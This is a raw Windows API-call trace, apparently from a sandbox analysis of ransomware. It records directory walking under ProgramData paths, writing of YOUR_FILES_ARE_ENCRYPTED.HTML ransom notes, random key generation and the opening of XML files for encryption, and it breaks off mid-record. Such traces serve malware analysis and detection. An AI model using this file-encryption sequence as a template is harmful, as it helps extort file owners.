[0109.910] GetProcessHeap () returned 0x600000 [0109.910] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.910] GetProcessHeap () returned 0x600000 [0109.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.910] GetProcessHeap () returned 0x600000 [0109.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.911] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0109.911] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.912] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0109.912] GetProcessHeap () returned 0x600000 [0109.912] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.912] GetProcessHeap () returned 0x600000 [0109.912] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.912] GetProcessHeap () returned 0x600000 [0109.912] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.913] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae64995a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae64995a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae64e6c3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.913] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae64995a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae64995a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae64e6c3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.913] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.913] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0109.913] GetProcessHeap () returned 0x600000 [0109.914] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.914] GetProcessHeap () returned 0x600000 [0109.914] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.914] GetProcessHeap () returned 0x600000 [0109.914] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.915] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0109.915] StrStrIW (lpFirst="DeviceSync", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.915] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 43 [0109.915] GetProcessHeap () returned 0x600000 [0109.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.916] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" [0109.916] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*" [0109.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6582d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.916] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6582d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.916] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6582d2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6582d2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae65d0ef, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.916] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6582d2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6582d2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae65d0ef, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.916] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.917] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0109.917] GetProcessHeap () returned 0x600000 [0109.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.917] GetProcessHeap () returned 0x600000 [0109.917] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.917] GetProcessHeap () returned 0x600000 [0109.917] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.918] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Diagnosis", cAlternateFileName="DIAGNO~1")) returned 1 [0109.918] StrStrIW (lpFirst="Diagnosis", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.918] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis") returned 42 [0109.918] GetProcessHeap () returned 0x600000 [0109.918] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.919] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis" [0109.919] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\*" [0109.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae735db0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0109.919] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae735db0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.919] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="AsimovUploader", cAlternateFileName="ASIMOV~1")) returned 1 [0109.919] StrStrIW (lpFirst="AsimovUploader", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.919] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader") returned 57 [0109.919] GetProcessHeap () returned 0x600000 [0109.919] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.920] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader" [0109.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*" [0109.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae67011d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName=".", cAlternateFileName="")) returned 0x626838 [0109.920] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae67011d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="..", cAlternateFileName="")) returned 1 [0109.921] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae67011d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae67011d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6751a7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.921] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae67011d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae67011d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6751a7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.921] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0109.921] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0109.921] GetProcessHeap () returned 0x600000 [0109.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\AsimovUploader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\asimovuploader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.921] GetProcessHeap () returned 0x600000 [0109.921] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.921] GetProcessHeap () returned 0x600000 [0109.921] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.922] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="DownloadedScenarios", cAlternateFileName="DOWNLO~1")) returned 1 [0109.922] StrStrIW (lpFirst="DownloadedScenarios", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.922] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios") returned 62 [0109.922] GetProcessHeap () returned 0x600000 [0109.922] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.923] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios" [0109.923] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*" [0109.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae68d5d4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.923] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae68d5d4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="..", cAlternateFileName="")) returned 1 [0109.923] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe010bd8d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe010bd8d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe010bd8d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="WINDOWS.DIAGNOSTICS.xml", cAlternateFileName="WINDOW~1.XML")) returned 1 [0109.923] StrStrIW (lpFirst="WINDOWS.DIAGNOSTICS.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.923] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml") returned 86 [0109.923] PathFindExtensionW (pszPath="WINDOWS.DIAGNOSTICS.xml") returned=".xml" [0109.923] lstrlenW (lpString=".xml") returned 4 [0109.923] PathFindExtensionW (pszPath="WINDOWS.DIAGNOSTICS.xml") returned=".xml" [0109.923] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.924] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe042cf6a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe042cf6a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe042cf6a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="WINDOWS.PERFTRACKESCALATIONS.xml", cAlternateFileName="WINDOW~3.XML")) returned 1 [0109.924] StrStrIW (lpFirst="WINDOWS.PERFTRACKESCALATIONS.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.924] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml") returned 95 [0109.924] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKESCALATIONS.xml") returned=".xml" [0109.924] lstrlenW (lpString=".xml") returned 4 [0109.924] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKESCALATIONS.xml") returned=".xml" [0109.924] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.924] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe05d08a5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe05d08a5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe05d08a5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="WINDOWS.PERFTRACKPOINTDATA.xml", cAlternateFileName="WINDOW~4.XML")) returned 1 [0109.924] StrStrIW (lpFirst="WINDOWS.PERFTRACKPOINTDATA.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.924] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml") returned 93 [0109.924] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKPOINTDATA.xml") returned=".xml" [0109.924] lstrlenW (lpString=".xml") returned 4 [0109.924] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKPOINTDATA.xml") returned=".xml" [0109.924] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.924] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe0263207, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe0263207, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0263207, ftLastWriteTime.dwHighDateTime=0x1d70067, 